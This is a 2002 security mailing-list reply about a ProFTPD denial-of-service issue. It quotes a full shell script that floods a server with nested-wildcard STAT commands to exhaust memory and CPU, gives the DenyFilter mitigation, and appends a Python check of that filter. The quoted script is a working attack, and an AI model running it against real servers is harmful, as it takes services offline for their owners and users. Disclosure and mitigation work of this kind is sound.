This is so old I can't even find any postings/articles I remember making on
it. Here is one link from early last year:

http://lwn.net/2001/0322/a/proftpd-dos.php3

Check the documentation:

DenyFilter \*.*/

Problem solved. People should search Google before posting, it's far less
embarrassing.

Kurt Seifried, kurt@seifried.org
A15B BEE5 B391 B9AD B0EF AEB0 AD63 0B4E AD56 E574
http://seifried.org/security/

----- Original Message -----
From: "Rob klein Gunnewiek" <rmkleing@hio.hen.nl>
To: <bugtraq@securityfocus.com>; <vulnwatch@vulnwatch.org>
Sent: Sunday, December 08, 2002 4:53 AM
Subject: [VulnWatch] proftpd <=1.2.7rc3 DoS

> Hello,
>
> proftpd is vulnerable to denial of service similar to the list
> */../*/../*/../*.
>
> #!/bin/sh
> #
> # proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
> # might work against many other FTP daemons
> # consumes nearly all memory and a lot of CPU
> #
> # tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
> #
> # 7-dec-02 - detach - www.duho.org
> #
> # use: ./prodos.sh <host> <user> <pass>
> # do this some more to make sure the system eventually dies
>
> cnt=25
> while [ $cnt -gt 0 ] ; do
> ftp -n << EOF&
> o $1
> quote user $2
> quote pass $3
> quote stat /*/*/*/*/*/*/*
> quit
> EOF
> let cnt=cnt-1
> done
> sleep 2
> killall -9 ftp
> echo DONE!
>
> #end
>
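
What the `DenyFilter \*.*/` rule from the reply above rejects and what it lets through, as an added example that is not part of the original thread or of ProFTPD's code. It assumes the filter is matched against the command's argument string, uses Python's `re` as a stand-in for the server's regex engine, and runs on constructed command lines; `split_command`, `wildcard_depth` and `audit` are hypothetical helper names.

```python
import re

# DenyFilter pattern from the reply above. Assumption: the server applies it
# to the command's argument string; Python's re stands in for POSIX regex.
DENY_FILTER = re.compile(r"\*.*/")


def split_command(line):
    """Split a raw FTP control-channel line into (VERB, argument)."""
    verb, _, arg = line.strip().partition(" ")
    return verb.upper(), arg


def wildcard_depth(arg):
    """Count path components containing '*', i.e. the directory levels the
    server would have to expand while globbing the argument."""
    return sum(1 for part in arg.split("/") if "*" in part)


def audit(lines):
    """Return (line, blocked_by_filter, wildcard_depth) for each command."""
    report = []
    for line in lines:
        _verb, arg = split_command(line)
        blocked = bool(DENY_FILTER.search(arg))
        report.append((line, blocked, wildcard_depth(arg)))
    return report


# Constructed sample commands (not captured traffic).
SAMPLE = [
    "STAT /*/*/*/*/*/*/*",    # argument used in the quoted script
    "LIST */../*/../*/../*",  # pattern named in the quoted post
    "LIST /pub/*.txt",        # ordinary glob in the last component only
    "NLST *.iso",
    "RETR /pub/readme.txt",
    "LIST */incoming",        # single-level glob, but '*' precedes a '/'
]

if __name__ == "__main__":
    for line, blocked, depth in audit(SAMPLE):
        print(f"{'DENY ' if blocked else 'allow'} depth={depth} {line}")
```

The last sample shows the cost of the rule: any argument in which a `*` appears before a `/` is refused, even when only one directory level is globbed.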